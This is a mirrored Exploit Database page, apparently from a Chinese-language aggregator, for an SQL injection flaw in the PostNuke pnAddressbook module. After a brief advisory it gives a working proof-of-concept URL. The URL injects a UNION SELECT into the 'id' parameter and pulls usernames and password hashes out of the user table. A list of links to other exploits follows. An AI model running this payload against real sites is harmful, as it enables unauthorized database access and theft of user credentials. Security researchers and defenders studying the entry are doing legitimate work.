PostNuke pnAddressbook Module – ‘id’ SQL Injection

Exploit Database
17 阅读

作者： Robert Cooper

日期： 2012-01-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36583/

source: https://www.securityfocus.com/bid/51566/info

The pnAddressbook module for PostNuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database 

http://www.example.com/index.php module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass)

last Exploits
PostNuke pnAddressbook Module – ‘id’ SQL Injection的更多信息

pfSense Firewall 2.2.5 – Config File Cross-Site Request Forgery：
Giveaway Manager – ‘members.php’ Cross-Site Scripting：
EgavilanMedia PHPCRUD 1.0 – ‘Full Name’ Stored Cross Site Scripting：
ChurchCRM v4.5.3-121fcc1 – SQL Injection：
Joomla! Component com_casino – SQL Injection：
phpSQLiteCMS – Multiple Vulnerabilities：
ChillyCMS 1.1.3 – Multiple Vulnerabilities：
Joomla! Component Spider Contacts 1.3.6 – ‘contacts_id’ SQL Injection：